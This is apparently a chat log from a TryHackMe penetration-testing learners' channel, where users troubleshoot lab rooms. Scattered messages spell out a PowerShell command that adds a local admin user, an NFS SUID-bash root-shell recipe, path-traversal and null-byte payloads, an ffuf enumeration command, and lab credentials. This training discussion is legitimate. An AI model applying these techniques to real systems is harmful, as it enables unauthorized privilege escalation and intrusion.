I was in a rush that day and kinda flew over the task page that included the xfreerdp details. After completing the room, the next day when I went back to take notes I found the xfreerdp recommendation right there.
That's what I did.
aaah, if that's the case that should be an easy fix
Hello everyone. Please, I have a problem: when I type this command sshtryhackme@10.10.212.158 on the attack box, I don't succeed in connecting to 10.10.212.158.
thank you, the room is root me
ok, thank you.
So how could I solve the problem please
thank you
Hi! I was reading the part on "fragmented packets" in the Nmap Advanced Port Scans section and there is something that I don't understand:
-
First, the path says: the option -f to fragment packets [...] the IP data will be divided into 8 bytes or less. Adding another -f (-f -f or -ff) will split the data into 16-byte fragments instead of 8.
-
On the other hand, taking a look at the image provided by TryHackMe, we can see that the IP data field occupies 4 bytes.
Then, how is it possible that the -f flag fragments the IP data into 8 bytes or less if the mentioned field is already less than 8 bytes, 4 specifically? I think there is something I missed, but I still don't get it. It only makes sense to me if the "IP data" term refers to all the data in the IP header, not only to the data field. Is this right?
But I kept reading and I found this: "The data that we will fragment across multiple packets is highlighted in red", referring to the fact that the data is in fact the part of the IP header that will be fragmented, so I definitely don't get it.
Or maybe the IP data field is longer than 8 bytes (or even 16) but in the image this isn't clear enough; I still need a confirmation. Thanks and regards!
Ok, sorry, I already realized that my question is very stupid, because it happens that the IP data is nothing else than the rest of the headers of the remaining layers of the OSI model, so of course this IP data field can be greater than 8 bytes. Sorry, I'm kind of new to this, I try to do my best hehehe. Regards.
Hey what is a Shrink Wrap code attack??
yep still going through the answers, somewhere they say something else and some other say some other thing so it's not clear
I knew you'd ask this
alright , I'll just keep looking around on google then. You're right
Ohhh really, glad I introduced it here then.
No it's not related to this path. but I am going through this path currently. I stumbled upon the term randomly, so thought of asking or searching on it but results aren't making much sense.
Quick question, I'm manually crawling a web page at the moment. I can't remember the file name that's kind of like robots.txt. THM mentioned this in the Jr pentester path in the same module, does anyone remember that file?
sitemap.xml????
???
I'm trying to exploit a directory vulnerability (with permission) and I've gotten only so far
No, it's from another site but has the same concepts
There are basic levels and I'm on the last one, basic 11.
I don't want to look up a writeup
Yeah... if I'm honest I don't trust social connections on that one lol
Well thanks guys, no worries. Just had that one question, I'll figure it out eventually
I found it!
Hi all, I completed this path today and I'm looking for advice on how best try and solidify what I've learnt. I feel like I have been given lots of bits of pieces but I'm not sure how well I could cobble it altogether solo at this point. Any recommendations on next steps / best ways to just practice, in order to get to grips with what I've been taught?
note taking note taking note taking
The note taking bit I'm fine with, it's the practice methods I need.
you could do the methodology room i guess
https://tryhackme.com/room/hackermethodology
Hello guys, I just wanna ask something about how to start in cyber security, especially the pen testing path.
You wanna know where to start in THM or just in general?
In general!
If you are here already, you can start doing the path on the TryHackMe website, because it is a very good starting point and can guide you further.
You can follow these paths.
These are all paths in THM?!
yes
Okay, ty for the info.
Hi. I asked for some help on this issue last week but received no help. So, I am asking again. On Privilege Escalation, Windows Privilege Escalation, Task 7, To change "Druva_inSync_exploit.txt", we need an administrator privilege. That privilege is the end goal of the task. Since I can't save the changes, I can't get the admin privilege to get the flag. HELP PLEASE!
Stuck for more than a week!!!
But the program looks in that location for it.
I thought the $cmd command looks in the same location for the file. But, it seems that we assign the changes in PowerShell:
```powershell
$cmd = "net user pwnd SimplePass123 /add & net localgroup administrators pwnd /add"
```
thanks @steel nymph
Gave +1 Rep to @steel nymph
I'm having an issue on the final task of the XXS room. I'm supposed to insert the cookie stealer payload into a support ticket and then "wait up to a minute" for the request to come through. I've waited 5 minutes, reset the box and waited another 5 minutes, I've tried triggering the netcat request myself but obviously my own cookie is the wrong answer, I tried changing my cookie to admin true and no change. Any tips?
Are you using your own machine to catch the cookie or the attackbox?
It's my own kali VM
I can try the attackbox
Yes, use the attackbox; it's somewhat of a known issue that it is not working properly over the VPN.
haha well I'm glad I asked! I would have kept racking my brain over this for hours. Thank you!
Can I just confirm that this is task 8 of https://tryhackme.com/room/xssgi ? I think I've seen @shadow echo comment about this elsewhere, but I'll put a note in the room that you may encounter difficulties using your own machine.
Yes sir that's correct! I was able to get it done successfully in the attack box but openvpn + personal machine was no bueno.
Brill, I'll put a note to make it clearer
Added: Note: You may encounter issues with receiving the request using your own VM and the VPN. It is recommended you use the AttackBox for this task.
sweet! Glad I could help in the future!
Damn right
No idea why it works for me, but it does.
Hi everyone! I have a doubt and I wonder if anyone could help me solve it.
In terms of a Windows machine specifically, if an application running in a process suddenly runs an executable, will this run in the same process as the application above, or does it run in another process? And, if the answer is the second, is this other process in fact a subprocess of the first? Regards!
For example, in case anyone doubts that this has something to do with the path: the SCM (Service Control Manager) is a process that manages other processes. Among other things, this process is responsible for running the executable associated with a service to initiate it. So my question would be whether this service runs in the same process as the SCM or in a subprocess.
Well, I don't know exactly how Windows does it... but in Linux every process is a subprocess of the init process, which tends to be systemd nowadays.
Ok thanks!
no problem
I would bet on https://tryhackme.com/room/btwindowsinternals having a good explanation of all the core processes on Windows.
That room??? It is not on any path as far as shadow knows.
yeah there are lots of good rooms that are on no paths
In the nmap room it says the following:
and then there's this example of an ARP scan, but since it uses sudo, meaning it defaults to an ARP scan, doesn't that render the -PR flag unnecessary?
https://nmap.org/book/man-host-discovery.html "If no host discovery options are given, Nmap sends an ICMP echo request, a TCP SYN packet to port 443, a TCP ACK packet to port 80, and an ICMP timestamp request. "
"The exceptions to this are the ARP (for IPv4) and Neighbor Discovery (for IPv6) scans which are used for any targets on a local ethernet network. " Just so I cover ARP scanning
Hi, where should I start when I want to be an ethical hacker? Is the path the same as for a penetration tester?
Hi, I'm doing the linux privesc part now
I mounted the share with no_root_squash, I put a shell script there to create a shell, and gave it the SUID bit, but when I open it via the machine it's not working?
I also tried another script to change bash's permissions on the machine
It is working with a binary file, I would like to know why is that
The suid bit does not apply to scripts.
Ok
Anyone online care to help with the Metasploit msfvenom part? My shell won't pop.
Please provide more information and someone will be able to help
I will start with starting over, and then I will ask in detail. I think I might have confused myself. Thanks anyway for now.
I got the shell at last... good feeling doing it without help.
nice work
Anyone have a moment to help on Linux priv esc, crontab section? No matter what I do I can't seem to catch the shell; I think I'm missing something. I have followed the examples and walkthroughs online but still got nothing.
Tried on the attack box and my Kali VM with OpenVPN.
Wow, nvm, had to change permissions... these get you man lol
gj though
Ty ty
A new Red Teaming path has been added.
A channel for the path will be created in discord SoonTM
How long is it normally taking people to complete the linux and windows privilege escalation rooms? It is taking me forever to do them.
almost done with the learning path tho!
oh, some of those take ages
Ok, glad it's not just me lol
Is going through all learning paths a good idea before I start studying for the ejpt? Or do them in parallel ?
Hi, I am new to cyber security and pentesting. I have no idea where to start and only have knowledge of a few concepts. Where should I start?
#start-here have a look here @grizzled monolith
Can I get some assistance with Windowsprivesc room, part of the JPT path?
At the very beginning of the "Abusing Dangerous privileges" section, it says to run whoami /priv to gather info on the privs available. Then it says to backup the SAM and System hashes. but, I get the following error:
It's like the user account is not getting assigned the intended privs when the box boots.
Are you on the correct target machine???
there is a new one for task 6
Yeah, I'm just returning to the module after a few weeks, so this happens right after launching the machine from task 6.
and you logged in using these creds:
Log in to the target machine via RDP using the following credentials:
User: THMBackup
Password: CopyMaster555
Yes.
this is after relaunching the machine from task 6 again.
same output.
The task also says to use any of the 3 methods to get the flag... So, I can't imagine the user account wouldn't have those privs.
The user is also in the Backup Admins group, but it still doesn't allow me to backup the hive.
oh, wait a sec

I didn't run the cmd prompt as admin.
The privs are there after I run the cmd prompt as admin.
thanks @sage current
Gave +1 Rep to @sage current
no problem
Sometimes it is the simplest problems that require some thinking and rubber duck debugging.
yes ma'am. it really do be that way sometimes lol. often overlook the simple things.
Hello! I am doing the hack the bank transferring the $2000 to account 8881. I have received the answer to be $767.68 as my account balance, yet it tells me the answer is wrong. Can someone explain?
The answer is not the balance amount; some text should appear that holds the answer to the question.
Hey all, I am doing the Web Hacking Fundamentals room and stuck in Authentication Bypass Task 3. How do I make sure my valid_usernames.txt is in the same directory as the terminal? It seems like ffuf can't locate the file. If anyone had the same trouble but was able to solve it, I'd appreciate your insight!
I mean, it doesn't have to be in the same directory, you can just provide the path to it, but if you want it to be in the same directory, just move it there ?
they are both in desktop. Doesn't it technically mean they are in the same directory?
Well, if your current working directory for your terminal is Desktop and the file is also in Desktop, then yes.
Hey is that normal that the address is now Machine_ip ?
It was something else 10 min ago; maybe it just got rebooted and I need to wait.
Machine_IP means your VM isn't deployed. I'd suggest you refresh the page and deploy the VM in the room.
Oooh, my bad, I was using OpenVPN but I think I forgot to turn it on.
Is anyone still here?
yeah whats up
i'm having an issue
https://tryhackme.com/room/linprivesc
I'm in this room. No matter what I do, I cannot make my nfs file run on karen's machine. I've tried all three shares, different file modes +s, +x, +sx, 777. It just won't run.
So you have the nfs file on the karen machine,
you have already done a chmod +x to make the file an executable,
and it still won't run?
?
i just the vm so let me get it running again and i'll screenshot and tag you at every step.
Also, an alternative to making an nfs binary and compiling that as code is to just directly use the bash binary from either the target machine or the attacking VM,
i.e. mount the nfs share
cp /bin/bash . in a terminal in the nfs share folder
chmod +s ./bash
chmod +x ./bash
and then finally run the file on the target machine
I made a video, but I'm on the phone and there's dead time.
do another ls -lah
I have a feeling you messed it up by mounting the folder after making the binary.
Now, even though I'm mounted to the share, it's not loading my files.
Says it's busy. Guess I'll have to call back later.
./nonsense
I think I may see the problem. My tun0 IP is not showing at the top of the room.
did it work
yeah you need to be connected to the vpn for it to work
And yes, it did work with the bash executable for shadow.
order of operations
mount -o rw ip:/home/ubuntu/sharedfolder /blah/dir/blah
cd /blah/dir/blah
cp /bin/bash .
chmod +s ./bash
on target machine:
./bash -p
tada root shell
forgot a step with cd
So, I need to chmod after the file is in the file share?
yeah
you copy the bash executable into the share
then change its perms in there,
as those then reflect the perms on the nfs shared folder and therefore on the target machine.
ok. i'm still getting a busy signal
are you speaking of yourself in third person ... or?
Wassup, what problems are there
Hmmm, give it half an hour and I am at my computer and I can help if you haven't gotten it yet
also this is shadow signing out
Mount first, create file and compile later.
Also, maybe don't have the directory you want to mount as your current working directory, so switch out of it to e.g. /home and then mount.
Ok, will do. I've done that before, but I'm ready to end this. This task is killing me.
that must have been the problem ...
@shadow echo Thanks. I thought I had done it that way before, but apparently not.
Gave +1 Rep to @shadow echo
I've spent so much time on this room today and felt like I've gotten absolutely nowhere.
( I came back and figured out challenge 1 and 2, I had parts of it right just not the full thing )
So for challenge 3, I'm doing it all in ||inspect element and the page itself. I've changed GET to POST and when inputting ../../../../etc/flag3 or ....//....//....//....//etc/flag3 in to the file name section, it's not giving me the results I 'expect'. Am I missing something somewhere else? I've been bashing my head against this for an hr or two now and I feel like I'm going in circles||
Can you show how your post request looks?
How did you change request to post? Do you see some headers? Share screenshot of your headers
I changed method="POST" in the screenshot and input the filename into the field. That's how I did it for task 1 as well @rustic totem
Is there a better way?
Yeah, there are many. Do you know how to use burp?
No, I've just been doing this purely from inspect element
I considered it but wasn't too sure
Use Burp or curl if you didn't get the flag.
Sounds good. I figured doing it via inspect element would help me learn the best, but it's just frustrating at this point lol
Well, that worked in curl. Still not sure why it didn't work in Burp or web developer tools though, doing the same thing.
Ironically the RFI challenge was probably the easiest.
Did you add Content-Type header in post request?
Nope. Would that need to have gone on its own line in burp?
I should have probably just done the burp/curl rooms
Then come back to this
But I'm just stubborn
How do I run ":" inside a hydra string? The error says http-post-data takes three colon-separated arguments, and my login form error is "Error: Invalid user or pass", but if I paste that error it becomes 4 colon arguments and gives me an error.
I'm having some trouble myself with this task. First I got an error trying to execute nfs as per the instructions on "karen's" side because of "error in exec", which I believe is due to compiling from an attacking box with a different CPU architecture, so I decided to do it all over again following the steps in this video, and now I'm getting a completely different error when trying to mount: "mount: /tmp/attacker: can't find in /etc/fstab"
any thoughts? I am running this from the attackbox now, so I'm root n'all..
Screenshot please
I suspect you're not telling it where to mount.
anyone looking for a study buddy? Pref GMT due to time but can work with others
It was this one but it's expired, let me just restart it.
I put 2395 as the size since it's the most occurring one, but the two commands have the same number of results.
The terminal is way more clear, ty
Will try in a few minutes
It worked! There was no problem after all, just a small terminal.
Protocols and Servers: Hypertext Transfer Protocol room and I am pretty sure this is the way to get to the flag. Am I doing something wrong? Thank you in advance
You have to press enter 2 times, otherwise telnet is waiting for another potential header that you could provide.
Since there is nothing coming, the connection is getting closed
In Command Injection, Practical (Task 5), is the reasoning for ||adding an &/; at the start of the command because they continue running the full command / run the second part of the input as a separate command respectively (I'm not sure I worded this right), so it checks first for filters/inputs, then goes "oh I'm also going to run this as a part of that command"||
Where are you expecting to see it? I don't see you running ls anywhere
@native forge Don't ask the same question over multiple channels, it's spam.
Hey, I have a question about the room wprivesc2_v1.1, Task 6 "Abusing dangerous privileges", part "SeBackup / SeRestore": I got both the .hive files onto my system, but I can't get Impacket's secretsdump to run. It gives the following:
```
$ secretsdump.py -sam sam.hive -system system.hive LOCAL
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[-] SAM hashes extraction failed: 'NoneType' object has no attribute '__getitem__'
[*] Cleaning up...
```
I tried different versions of secretsdump and also Python. Is this intended behavior and I am just missing something?
ls where? The instructions don't say that.
How do you expect to see the file if you aren't looking?
guys
short question
On the netsec challenge room
there is this question
Browsing to http://.... displays a small challenge that will give you a flag once you solve it. What is the flag?
The answer is an nmap -sN null scan.
basically the mission is to use the safest scan method to not get detected
Is a scan where I shorten the packets with -ff and use decoys safer than a simple nmap null scan?
I'm not sure if this is the right place for this question or not, but this is the room I'm currently in. I have been using the in-browser attack box and have completed the Pre-Security path and part of the Jr Penetration Tester path. Tonight I decided to use OpenVPN on my virtual machine. I connected to OpenVPN and verified it through the provided website. But any time I run a command in my terminal I get an error saying the file or directory doesn't exist. I'm currently on Authentication Bypass task 2 and I'm not sure how to fix this. Any help is appreciated.
what doesn't exist?
user@tryhackme$ ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/signup -mr "username already exists" this is the command I run and the error is for /usr/share/wordlists/SecLists/Usernames/Names/names.txt I just copy and pasted the command from the page when I type it in I use the correct IP address.
Can you cat /usr/share/wordlists/Seclists/Usernames/Names/names.txt
Hi guys! In the Authentication Bypass room, in task 3 exactly, the brute force with ffuf is not working properly. I got no result although I checked the syntax several times.
Any help please
this is how it looks
I managed to get past the problem by making changes to the wordlist; I tested the usernames one by one (a single username in the wordlist),
because when I iterated them as a list it doesn't work for me.
Your username wordlist contains blank spaces?
Hi guys, I'm right now doing
the Metasploit module
and when I needed to exploit the SMB port
the Metasploit script returns
[*] Started reverse TCP handler on 10.10.17.117:4444
[-] 10.10.191.91:445 - Exploit aborted due to failure: bad-config:
Are you SURE you want to execute code against a nation-state implant?
You MAY contaminate forensic evidence if there is an investigation.
Disable the DefangedMode option if you have authorization to proceed.
what does that mean
Can you verify and show your payload and options?
!docs verify
So
Can I renew my Discord token?
Because I verified with my old Discord account which got deleted,
I can't verify a new Discord account with the old token.
I accidentally used the wrong IP.
10.10.193.91
That's the attackbox IP.
I used 10.10.191.91
Ok, that error message comes if I use it on my personal IP too.
Wrong ip for what?
Well, I wanted to exploit the SMB port on the target system.
I used the EternalBlue module from Metasploit.
I had to set RHOSTS and LHOST.
Did you set RHOST to eth0?
I accidentally set RHOST to 10.10.191.91 instead of 10.10.193.91,
and then I got this weird error message.
You can just exit msf and re-enter it
```
[*] Started reverse TCP handler on 10.10.17.117:4444
[-] 10.10.191.91:445 - Exploit aborted due to failure: bad-config:
Are you SURE you want to execute code against a nation-state implant?
You MAY contaminate forensic evidence if there is an investigation.
Disable the DefangedMode option if you have authorization to proceed.
```
now I'm afraid I did something illegal
You wouldn't have.
but I think the exploit aborted anyway
```ruby
# Module-side check: when DefangedMode is left enabled, the module refuses to run
if datastore['DefangedMode']
  warning = <<~EOF
    Are you SURE you want to execute code against a nation-state implant?
    You MAY contaminate forensic evidence if there is an investigation.
    Disable the DefangedMode option if you have authorization to proceed.
  EOF
  fail_with(Failure::BadConfig, warning)
end
```
that's the source code
```ruby
# fail_with only raises; the exception is what aborts the module run
def fail_with(reason, msg = nil)
  raise Msf::Auxiliary::Failed, "#{reason.to_s}: #{msg}"
end
```
it immediately throws a runtime exception
I'm available
After a 2 month break of anything computer related. Time to get back to it. Finishing up the nmap labs now
You a beginner?
I have a SQLi question if anyone has a second
ha sorry - guess it's the Canadian in me
yup fair enough; I ended up bugging a buddy about it. Trying to wrap my head around how SQL queries work and my eyes were starting to cross
So in the SQL course I've encountered an error. The time based attack stopped working and just responded instantly in one millisecond for some reason.
Eventually I had to google the answer
No, it was ok. It was working fine at first but after a minute it broke and didn't report anything.
Anyone able to explain to me the Authentication Bypass Task 4? I've completed the task, I just don't 100% understand what is happening
Based on my understanding, it has to do with how $_REQUEST prioritizes the data. The key statement is the following: "If the same key name is used for both the query string and POST data, the application logic for this variable favours POST data fields rather than the query string."
Given this, the exploit leverages this by having the same key as part of the POST data fields. Note that the key originally exists as part of the query string.
The screenshot shows that the key exists as part of both the GET and POST data fields. It's the key from the POST that is used, which consequently contains the attacker's email. As such, the password reset is sent to the attacker's email
think I get it a little more, cheers for the help
No, there are no blank spaces
dang, I'm on the Privilege Escalation: Sudo and it's not taking the hashed password for the very last question
I'm even copy-pasting it
You have to crack the hash, then you can access user
Hello! Can any hacker tell me what goes on in your mind as you are pentesting? I'm trying to figure out the mindset
Hi @modest arch, welcome! Glad you are excited but please don't post the same question over multiple channels as it can be picked up as spam. TY and have fun here
Gave +1 Rep to @subtle wadi
robocop, grrr
my fault ty
no worries, thanks π
Got it, thanks!
Gave +1 Rep to @rustic totem
Hello, I'm right now at the last module of jr pentester, in the linux privilege room on task 11. I'm doing all the things as said in this task but I can't see my created files in the mounted directory of the target machine (basically I'm trying privesc using nfs). I've tried both my own attacker machine and the tryhackme kali linux machine as the attacking machine. I've also tried using different directories which can be mounted for privesc, but the files I create after mounting don't show up in the target machine's directory
Did you get this to work already?
No sir
Do you have some screenshots of what you have so far? I'm about to head out though. So I might not be able to look at it right away. There's usually people around though that could help also.
Finally finished the vulnerability capstone. Misread one word and couldn't figure out why it wasn't working lol
hi guys, can anyone explain to me how this works
C:\> move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
like I'm moving a file to another file
?
I thought the second argument of move needs to be a director
directory
did, but still don't understand it
MOVE [/Y | /-Y] [drive:][path]dirname1 dirname2
it even says "dirname2"
how did it work with 2 files
nope, you are not moving a file to another file. You are overwriting it. You are replacing Disk.exe with rev-svc2.exe. So, your syntax is overwriting the file. You can move a file to a directory, or a directory to a directory, with this command:
move source_path (the file that you want to move / its path) destination_path (the directory that you want to move it to)
So on the above example
the content of rev-svc2.exe will get put in Disk.exe
?
but the final filename is Disk.exe?
yes that's true
ok thanks, I really was confused
you're welcome hope it helped
ty mate it really did
What path is recommended after junior pentest? I haven't done Pentest+ yet
.
I'll probably check out pentest+ or the red teaming
Thank you. I was stuck on this and finally searched for help. lol
Gave +1 Rep to @idle bison
does anyone else have problems with starting up the browser attack box
Free users don't have internet access.
I'm a paid user
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-1029-aws x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information disabled due to load higher than 1.0
1 update can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Mon Sep 26 14:47:16 2022 from 10.100.1.240
Could not chdir to home directory /home/karen: No such file or directory
$
this screen gets shown when I try to open the browser attackbox
this looks like your target m/c, not the attackbox.
what do you mean with m/c?
machine
well, but I press on the big blue button (start attack box)
if you are sure about that, then it is a bug. "Karen" with low privileges belongs to target machines, not a full-fledged attack box. Try terminating both the target and the att-box and starting them again
When that happens to me, I refresh and the attack box usually pops up
Anyone able to help me with this 3rd flag?
changed method to POST and tried multiple file paths, just don't seem to be getting it
exactly what have you tried???
did you add a null byte to remove the added .php at the end
on the inspect tool I changed method from GET to POST and then put "../../../../etc/flag3%00" in the include search bar
yeah, there's a null byte
yup, that is a null byte alright.... though this question also filters out / so you might need to do some trickery with those too
I've tried doubling them too, you mean the "....//"?
have you tried url encoding the /
not sure what that is
I've seen people doing it within the terminal with curl but I didn't need to use it for the previous tasks
well, for the easiest way to get this flag people use burp suite
Is it the request payload that's the problem?
Still not quite able to do it, I changed content type to "application/json" but just can't do it in the browser
I could easily get the answer in the terminal but my brain is telling me to do it in the browser
would I just use "/." instead then?
ok so I got annoyed at not knowing the flag so I did it in the terminal and got it, but this still annoys me so
I tried the hex version of the null byte "0x00" which didn't work either, and when I encoded the "%" first it encoded it again
the only thing I can think of is to change the header but still no luck
any more hints for this suffering soul?
bro, can you tag your main question so that I can understand
@clear pawn You tried POST request ??
Oh my bad. I was reading the whole issue rn
I'll try it on developer tools
I think that is because of $_REQUEST var try changing form method to POST too
Yeah, I've been trying that and it gets me past being able to use symbols, but when I use a null byte it doesn't stop the append of ".php"
You sure you are not using GET method ??
Pretty sure, have to retype it out every time the page refreshes haha
Hi
A general question - from the explanation it looks as if the PATH privilege escalation is a silver bullet that will work no matter what (using /tmp). Am I getting this wrong?
Definitely wrong
You need a vulnerable program with the SUID bit etc set in order to exploit it
I tried to run this command: hashcat -m 0 -a 3 -O hash /usr/share/wordlists/rockyou.txt
And got this error. Can someone tell me how I can resolve this?
Device #1: Not enough allocatable device memory for this attack.
Are you trying to run hashcat in a VM?
I think you'll need your own attacking machine for this with at least 3 GB RAM

